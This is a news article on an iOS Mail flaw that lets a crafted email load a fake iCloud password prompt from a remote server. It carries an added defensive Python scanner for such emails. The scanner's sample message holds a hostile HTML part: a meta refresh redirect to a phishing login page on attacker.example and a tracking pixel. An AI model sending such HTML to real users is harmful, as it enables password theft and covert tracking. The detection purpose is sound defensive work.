New iOS bug makes stealing iCloud passwords easy
To trigger the attack, all that is needed is an email carrying a specially crafted HTML tag sent to the target and an Internet-connected computer that hosts the fake login prompt.

New Delhi: A security researcher has discovered a serious bug in Apple's iOS platform that could give attackers easy access to users' iCloud passwords.

The bug, published as a proof-of-concept, exploits a flaw in the default email app, Mail. Since iOS 8.3, the app has failed to strip potentially dangerous HTML from incoming email messages.

A report on Ars Technica notes that the proof-of-concept loads a form from a remote server that looks identical to the genuine iCloud login prompt, and that the form can be displayed each time the rigged message is viewed.

Because the offending tag is no longer removed, remote HTML content can be loaded in place of the original email message. The exploit can also be programmed to display the password prompt only once, which makes it look more like a genuine system dialogue; for this it uses the HTML autofocus feature to hide the dialogue field once the user taps OK.

To trigger the attack, all that is needed is an email carrying the crafted HTML tag sent to the target and an Internet-connected computer that hosts the fake login prompt.

Mail's built-in web view then renders the remote content inside the message, where it is easily mistaken for the original email. The same ability to load remote content could also be used to embed 'beacons' that let senders know who has viewed an email, when it was viewed and from what Internet address.
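The attack above relies on three things an inbound mail filter can look for: an HTML tag that replaces the message with a remote page, a credential form, and remote resources used as tracking beacons. The following Python scanner is an added example written for this page; it is not the researcher's proof-of-concept, Apple's code, or anything from the Ars Technica report. It assumes, because the page does not name the tag, that the injected element is an HTML meta refresh redirect; the sample message, the attacker.example host and the function names are constructed for the example. It also shows the remediation Mail lacked, stripping the redirect from the HTML part.

```python
"""Scanner for the HTML-injection trick described above (added example).

Assumptions not stated on the page: the injected element is a
<meta http-equiv="refresh"> redirect, remote content is any http(s) URL,
and the credential prompt is a <form> containing a password field.
"""
import email
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message: an HTML part that redirects to an
# attacker-hosted page and also carries a 1x1 tracking pixel.
SAMPLE_EMAIL = """\
From: sender@example.com
To: victim@example.com
Subject: Your invoice
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Please see the attached invoice.
--b1
Content-Type: text/html; charset="utf-8"

<html><head>
<meta http-equiv="refresh" content="0; url=http://attacker.example/login.html">
</head><body>
<p>Please see the attached invoice.</p>
<img src="http://attacker.example/pixel.gif?id=42" width="1" height="1">
</body></html>
--b1--
"""

REMOTE_TAGS = {"img", "iframe", "script", "link", "object", "embed"}


def _refresh_target(content):
    """Pull the URL out of a refresh directive such as '0; url=http://x'."""
    for part in content.split(";"):
        part = part.strip()
        if part.lower().startswith("url="):
            return part[4:].strip().strip("'\"")
    return ""


class InjectionScanner(HTMLParser):
    """Records (kind, detail) findings while walking an HTML document."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._form_action = None  # action of the <form> currently open

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # The whole message gets replaced by whatever this URL serves.
            self.findings.append(("meta_refresh", _refresh_target(a.get("content", ""))))
        elif tag in REMOTE_TAGS:
            src = a.get("src") or a.get("href") or a.get("data") or ""
            if urlparse(src).scheme in ("http", "https"):
                self.findings.append(("remote_resource", src))  # possible beacon
        elif tag == "form":
            self._form_action = a.get("action", "")
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.findings.append(("password_field", self._form_action or ""))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form_action = None


def scan_html(html_text):
    """Scan one HTML document and return its findings in document order."""
    scanner = InjectionScanner()
    scanner.feed(html_text)
    scanner.close()
    return scanner.findings


def scan_message(raw):
    """Parse a raw RFC 822 message and scan every text/html part."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            findings.extend(scan_html(part.get_content()))
    return findings


def verdict(findings):
    """Map findings to a filter decision: 'block', 'warn' or 'ok'."""
    kinds = {kind for kind, _ in findings}
    if "meta_refresh" in kinds or "password_field" in kinds:
        return "block"
    if "remote_resource" in kinds:
        return "warn"
    return "ok"


def strip_refresh(html_text):
    """Remove meta refresh tags, the sanitisation step Mail should apply."""
    pattern = r"<meta\b[^>]*\bhttp-equiv\s*=\s*[\"']?refresh[\"']?[^>]*>"
    return re.sub(pattern, "", html_text, flags=re.IGNORECASE)


if __name__ == "__main__":
    found = scan_message(SAMPLE_EMAIL)
    for kind, detail in found:
        print(f"{kind}: {detail}")
    print("verdict:", verdict(found))
```

Running the block on the constructed sample reports the redirect target and the tracking pixel and returns a "block" verdict; a message that only carries remote images is downgraded to "warn", since ordinary newsletters load remote content too. The regex-based `strip_refresh` is deliberately simple and only handles the one tag assumed here; a real mail client needs a full HTML sanitiser rather than a single pattern.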

To avoid falling for such a phishing attempt, users confronted with an unexpected login prompt should press Cancel without entering credentials. If they do want to enter their password, they should do so only when no email message is open.

To identify a counterfeit prompt, press the Home button. If pressing the Home button while a prompt is displayed returns the device to the home screen, the prompt is a hoax and should not be trusted.

Apple was informed of the vulnerability in January. However, according to the researcher, the company has so far declined to provide a fix.
